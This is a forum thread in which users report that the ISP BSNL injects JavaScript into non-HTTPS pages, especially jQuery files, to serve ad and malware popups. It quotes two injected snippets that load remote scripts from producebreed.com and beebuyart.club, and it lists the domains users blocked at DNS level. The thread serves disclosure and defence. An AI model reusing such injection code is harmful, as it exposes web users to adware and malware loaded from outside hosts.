BSNL is inserting ads in websites, sending their users to malware sites through malware code injection

Sooner the better 🙏
 
It appears the old way of injecting the code that gets pulled from servers hosted by BSNL has changed.

On tracking the popups, the following code gets injected to the JS file served from the non-HTTPS website (mostly jquery related files)

JavaScript:
document.addEventListener('DOMContentLoaded', function() {
    var esp = document.createElement('span');
    var esr = document.createElement('script');
    esr.src = 'http://producebreed.com/rveYQkug53SsOr/6933?ndn=er';
    esr.type = 'text/javascript';
    esp.appendChild(esr);
    document.body.appendChild(esp);
}, false);

The particular JS gets called once the page has loaded and pulls in some more JS code from the URL http://producebreed.com/rveYQkug53SsOr/6933?ndn=er. The second and third parts of the URL vary dynamically. So far I've noticed the JS being served only from producebreed.com, but I'm sure there are many other such domains being used.

Now this JavaScript triggers popups from a whole bunch of other domains like areantaid.site, arcaptart.site and allashark.site.

This is a very shady move from BSNL just to get some ad revenue, and it is subjecting their users to malware/adware. The majority of BSNL's users may not be technically savvy enough to realise this or to add measures to block such things, so their devices end up infected by this malware/adware.
 
Another domain being used: beebuyart.club 😡

JavaScript:
document.addEventListener('DOMContentLoaded', function() {
    var esp = document.createElement('span');
    var esr = document.createElement('script');
    esr.src = 'http://beebuyart.club/rJCq50N0NFLDj/6932?ndn=ch2';
    esr.type = 'text/javascript';
    esp.appendChild(esr);
    document.body.appendChild(esp);
}, false);
 
They have malware sitting on their servers.
When I was using BSNL BB, I used to get shady popups every now and then. This is seriously f**ked up, but some ISPs use injection for bill payment reminders too.
But no other ISP that I know of does this kind of shit.
 


Yep, for both. So for now I've blocked the malicious domains that are part of this at the DNS level. The domains are:
areantaid.site
arcaptart.site
allashark.site
producebreed.com
beebuyart.club
allashail.club



I also noticed that for most sites I checked, they seem to target the jQuery JS file. In some cases this file is not even hosted by the affected site; it's hosted by Google, but the site links to the non-HTTPS version.

Here is the modified jQuery JS file fetched from http://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js


 